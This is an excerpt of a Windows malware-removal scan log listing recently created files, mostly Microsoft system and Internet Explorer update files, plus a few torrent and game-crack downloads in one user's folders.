2015-11-01 15:44 - 2015-11-01 15:44 - 00089910 _____ C:\Users\KW\Downloads\[kat.cr]the.knick.s02e03.720p.hdtv.x264.killers (1).torrent
2015-10-23 21:41 - 2015-11-09 20:13 - 00000000 ____D C:\Users\KW\AppData\Roaming\Dark Void
2015-10-23 21:41 - 2015-10-23 21:41 - 00002289 _____ C:\Users\KW\Desktop\Dark Void.lnk
2015-10-23 20:44 - 2015-10-23 20:44 - 00012796 _____ C:\Users\KW\Downloads\[kat.cr]dark.void.repack.r.g.mechanics.torrent
2015-10-17 22:05 - 2015-10-17 22:06 - 18454668 _____ C:\Users\KW\Downloads\Rocket.League.V1.06.Almost.Fully.Working.Online.Fix.V5-RVTFiX.rar
2015-10-17 18:21 - 2015-10-17 18:21 - 00046794 _____ C:\Users\KW\Downloads\[kat.cr]the.knick.s02e01.720p.hdtv.x264.killers.cttv.torrent
2015-10-15 15:44 - 2015-10-15 15:44 - 00000000 ____D C:\Windows\pss
2015-10-14 12:45 - 2015-09-18 13:22 - 00025432 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2015-10-14 12:45 - 2015-09-18 13:19 - 01291264 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-10-14 12:45 - 2015-09-18 13:19 - 00766464 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-10-14 12:45 - 2015-09-18 13:19 - 00700416 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-10-14 12:45 - 2015-09-18 13:19 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-10-14 12:45 - 2015-09-18 13:19 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2015-10-14 12:45 - 2015-09-18 13:09 - 01163776 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-10-13 16:12 - 2015-09-18 13:31 - 00391784 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-10-13 16:12 - 2015-09-18 12:58 - 00345688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-10-13 16:12 - 2015-09-15 22:48 - 25851904 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-10-13 16:12 - 2015-09-15 22:36 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-10-13 16:12 - 2015-09-15 22:36 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-10-13 16:12 - 2015-09-15 22:22 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-10-13 16:12 - 2015-09-15 22:21 - 02886656 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-10-13 16:12 - 2015-09-15 22:21 - 00585728 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-10-13 16:12 - 2015-09-15 22:21 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-10-13 16:12 - 2015-09-15 22:21 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-10-13 16:12 - 2015-09-15 22:21 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-10-13 16:12 - 2015-09-15 22:14 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-10-13 16:12 - 2015-09-15 22:13 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-10-13 16:12 - 2015-09-15 22:10 - 00616960 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-10-13 16:12 - 2015-09-15 22:09 - 05990912 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-10-13 16:12 - 2015-09-15 22:08 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-10-13 16:12 - 2015-09-15 22:08 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-10-13 16:12 - 2015-09-15 22:08 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-10-13 16:12 - 2015-09-15 22:08 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-10-13 16:12 - 2015-09-15 22:01 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-10-13 16:12 - 2015-09-15 21:58 - 20357632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-10-13 16:12 - 2015-09-15 21:58 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-10-13 16:12 - 2015-09-15 21:50 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-10-13 16:12 - 2015-09-15 21:46 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-10-13 16:12 - 2015-09-15 21:45 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-10-13 16:12 - 2015-09-15 21:45 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-10-13 16:12 - 2015-09-15 21:43 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-10-13 16:12 - 2015-09-15 21:41 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2015-10-13 16:12 - 2015-09-15 21:33 - 00504832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-10-13 16:12 - 2015-09-15 21:33 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-10-13 16:12 - 2015-09-15 21:32 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-10-13 16:12 - 2015-09-15 21:32 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-10-13 16:12 - 2015-09-15 21:31 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2015-10-13 16:12 - 2015-09-15 21:31 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-10-13 16:12 - 2015-09-15 21:29 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-10-13 16:12 - 2015-09-15 21:29 - 00720896 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-10-13 16:12 - 2015-09-15 21:28 - 02279936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-10-13 16:12 - 2015-09-15 21:28 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-10-13 16:12 - 2015-09-15 21:26 - 02126336 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-10-13 16:12 - 2015-09-15 21:26 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-10-13 16:12 - 2015-09-15 21:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-10-13 16:12 - 2015-09-15 21:24 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-10-13 16:12 - 2015-09-15 21:23 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-10-13 16:12 - 2015-09-15 21:22 - 14458368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-10-13 16:12 - 2015-09-15 21:22 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-10-13 16:12 - 2015-09-15 21:22 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-10-13 16:12 - 2015-09-15 21:15 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-10-13 16:12 - 2015-09-15 21:11 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-10-13 16:12 - 2015-09-15 21:10 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-10-13 16:12 - 2015-09-15 21:07 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-10-13 16:12 - 2015-09-15 21:06 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-10-13 16:12 - 2015-09-15 21:05 - 04527616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-10-13 16:12 - 2015-09-15 21:05 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-10-13 16:12 - 2015-09-15 21:04 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2015-10-13 16:12 - 2015-09-15 20:59 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-10-13 16:12 - 2015-09-15 20:58 - 12853760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-10-13 16:12 - 2015-09-15 20:58 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2015-10-13 16:12 - 2015-09-15 20:56 - 00689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-10-13 16:12 - 2015-09-15 20:55 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-10-13 16:12 - 2015-09-15 20:55 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-10-13 16:12 - 2015-09-15 20:48 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-10-13 16:12 - 2015-09-15 20:37 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-10-13 16:12 - 2015-09-15 20:34 - 01311232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-10-13 16:12 - 2015-09-15 20:32 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-10-13 16:12 - 2015-08-06 12:04 - 14176768 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-10-13 16:12 - 2015-08-06 12:03 - 01866752 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2015-10-13 16:12 - 2015-08-06 11:44 - 12875776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2015-10-13 16:12 - 2015-08-06 11:44 - 01498624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2015-10-13 16:10 - 2015-09-28 21:16 - 05569472 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-10-13 16:10 - 2015-09-28 21:13 - 01730496 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-10-13 16:10 - 2015-09-28 21:11 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 01216512 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-10-13 16:10 - 2015-09-28 21:10 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-10-13 16:10 - 2015-09-28 21:10 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-10-13 16:10 - 2015-09-28 21:10 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-10-13 16:10 - 2015-09-28 21:09 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2015-10-13 16:10 - 2015-09-28 21:09 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-10-13 16:10 - 2015-09-28 21:05 - 03990976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-10-13 16:10 - 2015-09-28 21:05 - 03936192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-10-13 16:10 - 2015-09-28 21:05 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-10-13 16:10 - 2015-09-28 21:05 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-10-13 16:10 - 2015-09-28 21:02 - 01311768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 21:01 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-10-13 16:10 - 2015-09-28 20:59 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2015-10-13 16:10 - 2015-09-28 20:58 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2015-10-13 16:10 - 2015-09-28 20:58 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2015-10-13 16:10 - 2015-09-28 20:58 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2015-10-13 16:10 - 2015-09-28 20:58 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2015-10-13 16:10 - 2015-09-28 20:57 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2015-10-13 16:10 - 2015-09-28 20:57 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2015-10-13 16:10 - 2015-09-28 20:57 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2015-10-13 16:10 - 2015-09-28 20:57 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2015-10-13 16:10 - 2015-09-28 20:53 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2015-10-13 16:10 - 2015-09-28 20:53 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 20:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 19:50 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2015-10-13 16:10 - 2015-09-28 19:49 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2015-10-13 16:10 - 2015-09-28 19:49 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2015-10-13 16:10 - 2015-09-28 19:43 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2015-10-13 16:10 - 2015-09-28 19:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2015-10-13 16:10 - 2015-09-28 19:40 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 19:40 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 19:40 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2015-10-13 16:10 - 2015-09-28 19:40 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 03168768 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 02607104 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00696320 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-10-13 16:10 - 2015-09-25 12:07 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-10-13 16:10 - 2015-09-25 12:06 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-10-13 16:10 - 2015-09-25 12:06 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2015-10-13 16:10 - 2015-09-25 12:06 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-10-13 16:10 - 2015-09-25 12:06 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2015-10-13 16:10 - 2015-09-25 11:59 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-10-13 16:10 - 2015-09-25 11:59 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-10-13 16:10 - 2015-09-25 11:59 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-10-13 16:10 - 2015-09-25 11:59 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2015-10-13 16:10 - 2015-09-25 11:58 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-10-13 16:10 - 2015-09-15 12:17 - 00157016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-10-13 16:10 - 2015-09-15 12:17 - 00097112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-10-13 16:10 - 2015-09-15 12:11 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-10-13 16:10 - 2015-09-15 12:11 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-10-13 16:10 - 2015-09-15 12:10 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-10-13 16:10 - 2015-09-15 11:36 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-10-13 16:10 - 2015-09-15 11:36 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2015-10-13 16:10 - 2015-09-15 11:36 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
